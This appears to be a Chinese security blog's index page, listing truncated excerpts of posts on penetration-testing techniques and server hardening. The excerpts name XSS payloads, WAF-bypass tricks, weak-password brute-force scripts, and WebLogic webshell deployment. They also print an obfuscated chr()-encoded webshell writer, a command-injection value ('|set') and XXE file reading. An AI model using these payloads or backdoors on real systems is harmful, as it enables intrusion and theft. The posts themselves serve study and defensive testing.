一个网络安全爱好者
收集的一些XSS payload,主要分为五大类,便于查阅。 #第一类:Javascript URL link link link Hello Hello link link link link Hello link Hello link link link ...
ngx_lua_waf ngx_lua_waf是一个基于lua-nginx-module(openresty)的web应用防火墙 源码:https://github.com/loveshell/ngx_lua_waf 安装部署 系统版本:Centos6.
0x01 背景 探索玩了Mysql特性,继续来探索一下MSsql特性。 0x02 测试 常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin 位置一...
0x01 背景 Mysql数据库特性探索,探索能够绕过WAF的数据库特性。 0x02 测试 常见有5个位置即: SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置三】1,user()【位置四】from【位置五】adm...
0x01 背景 oracle与mysql特性类似,半自动化fuzz了一下,记录成果。 0x02 测试 位置一:参数和union之间的位置 1)空白字符 Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20 2)注释符号/**/ 3)其他字符 %2e .
出于安全目的,在禁用了devMode之后,仍然不希望其他人员看到webconsole.html页面,则可以直接删除webconsole.html 的源文件, 它的位置存在于: 我们手工删除 struts2-core-*.jar\org\apache\struts2\interceptor\debugging\ 文件夹下的browser.ftl、console.ftl、 webconsole.html、webconsole.js 即可 。
WSUS客户端配置 我们要让客户端计算机能够通过WSUS服务器下载更新程序,而这个设置在域环境和单台PC是的方法不同,这里介绍一下本地计算机如何进行设置。 1、开始--运行--输入gpedit.msc,打开本地组策略编辑器。
分享两个小脚本,用来WAF Bypass简单FUZZ的 第一个:先生成一个字典,带入搭建的环境进行FUZZ,针对某些软WAF挺好用的,可FUZZ出不少姿势出来,记得先把CC攻击加入白名单才行哦。。。 #! /usr/bin/env python # _*_ coding:utf-8 _*...
window2003 window2008
Requests是Python的一个优雅而简单的HTTP库,它比Pyhton内置的urllib库,更加强大。 0X01 基本使用 安装 Requests,只要在你的终端中运行这个简单命令即可: pip install requests 基本HTTP 请求类型: r = requests.
urllib 是python内置的基本库,提供了一系列用于操作URL的功能,我们可以通过它来做一个简单的爬虫。 0X01 基本使用 简单的爬取一个页面: import urllib2 request = urllib2.
最近一段时间,都在做内网服务器全网段的安全检测,也算积累了一些经验,在这边小结检测的流程和思路,也方便自己复习。 检测目的:尽可能的帮助客户发现服务器网段中可能面临的威胁、存在的安全弱点 检测条件:一个接入点,可以访问一个或多个服务器网段。
File Upload File Upload,即文件上传漏洞,一般的上传漏洞可能是未验证上传后缀 或者是验证上传后缀被bypass 或者是上传的文件验证了上传后缀但是文件名不重命名。 LOW 直接上传任意文件 MEDIUM 验证Content-Type,修改Content-Type为 image/jpeg直接绕过 HIGH 验证了后缀名、文件大小及限制了上传文件的文件头必须为图像类型。
亲手打造了一款弱口令检测工具,用Python编写,主要可以用于内网渗透、弱口令检测等方面,目前集成了常见端口服务,包含 系统弱口令:ftp、ssh、telnet、ipc$ 数据库弱口令:mssql、mysql、postgre、mongodb 中间件弱口令:phpmyadmin、tomcat、w...
选择“打开或者关闭windows防火墙”把防火墙打开,然后选择“高级设置”,选择“创建规则”来指定端口。(这里也可以在“入站规则”里选择已经存在的端口。) 指定ip开放3389端口 某新服务器,开放80、3389后,Nmap扫描结果: 禁止这4条规则 ...
Microsoft Windows恶意软件删除工具可以检查运行 Windows XP、Windows 2000 和 Windows Server 2003 的计算机是否受到特殊、流行的恶意软件(包括 Blaster、Sasser 和 Mydoom)的感染,并帮助您删除所有找到的感染病毒。
IIS默认日志记录在C:\WINDOWS\system32\LogFiles,时间一长,特别是子站点多的服务器,一个稍微有流量的网站,其日志每天可以达到上百兆,这些文件日积月累会严重的占用服务器磁盘空间。
一、安装与简介 pip install threadpool pool = ThreadPool(poolsize) requests = makeRequests(some_callable, list_of_args, callback) [pool.
String id = request.getParameter("id"); String id = id.replace("'",""); String id = request.
ftp弱口令猜解 python脚本: #! /usr/bin/env python # _*_ coding:utf-8 _*_ import ftplib,time username_list=['root','ftp','admin'] password_list=[...
telnet 弱口令猜解脚本 测试环境:window2003、centos7 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import telnetlib username_list=['xiaozi','adm...
PHPMyAdmin弱口令猜解 测试截图: 代码片段 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import time username_list=['root'] password_l...
WebLogic 默认端口7001 可以通过如下链接访问控制台 http://10.9.1.1:7001/console/login/LoginForm.jsp 写了一个简单的猜解脚本,半成品,做个记录。
WebLogic 默认端口7001,一般可以通过这样来访问 http://10.9.1.1:7001/console 控制台 通过弱口令weblogic/weblogic登录控制台,下一步获取如何上传webshell呢? 1、点击锁定并编辑 2、选择部署,进一步点击右边的安装 ...
0x01 关于Pocscan Pocscan是一款开源 Poc 调用框架,可轻松调用Pocsuite,Tangscan,Beebeeto,Knowsec老版本POC 按照官方规范编写的 Poc对目标域名进行扫描,通过 Docker 一键部署,麻麻再也不怕搭建麻烦了 。
Tomcat 服务器网页部署,登录需用户名/密码,编写了一个简单的Python脚本来测试一些简单的弱口令。 测试环境:Tomcat版本 7.0 登录界面采用basic认证,Base 64加密一下,模拟浏览器进行发包 据测试,每个用户名输入5次错误的密码会锁定用户,想了一些办法,还是没能绕过,这里做个记录,有时间再完善。
网络上找到的在sqlplus中执行cmd的一些命令,主要有四种方法,这边都做了一下测试,这里做一下记录: 测试环境:window2003+Oracle 11.2.0.1.0 第一种方法: 最简单的执行cmd命令方法,但执行的本机的cmd命令,非数据库系统的cmd命令,故和本机打开cmd命令一样,貌似没什么用。
一直想摸索一下orcl提权的方式,今天测试了一下10g,可以成功提权。 C:\wmpub>sqlplus scott/tiger@orcl SQL*Plus: Release 10.2.0.1.
Win7旗舰版安装Oracle_11gR1_database: http://my.oschina.net/laiwanshan/blog/89951 Oracle用户登陆 sqlplus sys/manager@testdb as sysdba sys默认密码登陆 sqlpl...
mysql默认状态下是不开放对外访问功能的 1、如何设置才能允许外网访问MySQL 使用“mysql -uroot -proot”命令可以连接到本地的mysql服务; 使用“use mysql”命令,选择要使用的数据库,修改远程连接的基本信息,保存在mysql数据库中,因此使用mysql数据库; 使用“GRANT ALL PRIVILEGES ON *.
针对等级保护三级系统的防护要求,对于应用安全涉及的“身份鉴别”、“访问控制”、“安全审计”、“剩余信息保护”、“通信完整性”、“通信保密性”、“抗抵赖”、“软件容错”以及“资源控制”等控制点进行评分,具体如下表所示: 应用安全 身份鉴别 a) 应提供专用的登录控制模块对登录用户进行身份标识和鉴别; 1)未提供登录控制模块,实施操作前无需进行身份鉴别。
phpstudy开启apache日志并且按照日期划分创建。 CustomLog "|bin/rotatelogs.exe logs/access_%Y_%m_%d.log 86400 480" combined 这里修改成上图所示,然后重启apache。
0x01 禁止目录列表访问 (1) 备份httpd.conf配置文件,修改内容: Options FollowSymLinks AllowOverride None Order allow,deny Allow from all 将Options Indexes FollowSymLinks 中的Indexes 去掉,就可以禁止 Apache 显示该目录结构。
文件下载漏洞 漏洞代码: 0 then Reaponse.status="404" else Response.ContentType="application/octet-stream" Response.
命令执行漏洞: 保存为cmd.asp,提交链接: http://localhost/cmd.asp?ip=127.0.0.1 即可执行命令 利用方式: http://localhost/cmd.asp?ip=127.0.0.1|set 漏洞修复方式一: 把输入的值当作参数来执行,避免命令执行漏洞,可能会占用系统资源,不够优化。
XPath注入 XQuery注入 测试语句:'or '1'='1 利用工具: Xcat介绍 Xcat是python的命令行程序利用Xpath的注入漏洞在Web应用中检索XML文档 下载地址:https://github.
XML实体注入漏洞 测试代码1:新建xmlget.php,复制下面代码 漏洞测试利用方式1:有回显,直接读取文件 ]> &xxe; LINUX: http://192.168.106.154/xml/example1.php?xml=&name; 读取passwd文件,需URL编码后执行。
SQLite 官网下载:www.sqlite.org/download.html sqlite管理工具:http://www.yunqa.de/delphi/products/sqlitespy/index sqlite_master隐藏表,具体内容如下: 字段:type/name/tb...
测试了一个网站是Sqlite数据库,还装有安全狗,绕过了防护,找到Payload,写了一个Python脚本来跑表,这里总结一下: 取得sqlite数据库里所有的表名 查询table,type 段是'table',name段是table的名字, so: select name from s...
1、ASP上传过程抓包分析: POST /4.asp HTTP/1.1 Host: 192.168.1.102 User-Agent: Mozilla/5.0 (Windows NT 10.
XSS漏洞: 漏洞代码: 漏洞利用: 漏洞修复: Server.HTMLEncode(string):HTMLEncode 方法对一段指定的字符串应用 HTML 编码。修复代码如下:
ASP注入漏洞 一、SQL注入的原因 按照参数形式:数字型/字符型/搜索型 1、数字型sql查询 sql注入原因: ID=49 这类注入的参数是数字型,SQL语句原貌大致如下: id=request.
自己写的一段Python脚本,经常拿来验证一些sqlmap等工具跑不出数据的网站。 GET类型: import urllib import urllib2 import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.
在测试过程中,经常需要自己本地构造注入点来进行SQL测试,这边分享一下,不同环境下构造SQL注入的代码。 PHP+MYSQL版 ASP+MSSQL版 ASP.
Insert: 语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....) 报错注入: insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0...
使用发包工具构造http请求包检测 以fiddler工具为例,构造如下图的请求包: 1 GET http://192.168.174.145/ HTTP/1.12 Host: 192.168.174.
原文出处:http://my.oschina.net/longquan/blog/155905 首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 //密码为a,使用中国菜刀连接 隐藏很深的小马 fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).。
一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。
XSS漏洞验证经常遇到一些过滤,如何进行有效验证和绕过过滤呢,这里小结一下常见的一些标签,如等。 参考链接:http://www.jb51.net/tools/xss.htm http://d3adend.
IIS短文件名漏洞在windows服务器上面非常常见,也就是利用“~”字符猜解暴露短文件/文件夹名,比如,采用这种方式构造URL:http://aaa.com/abc~1/.aspx,根据IIS返回的错误信息,猜测该路径或文件是否存在,具体可参考这篇文章:http://www.freebuf.com/articles/4908.html。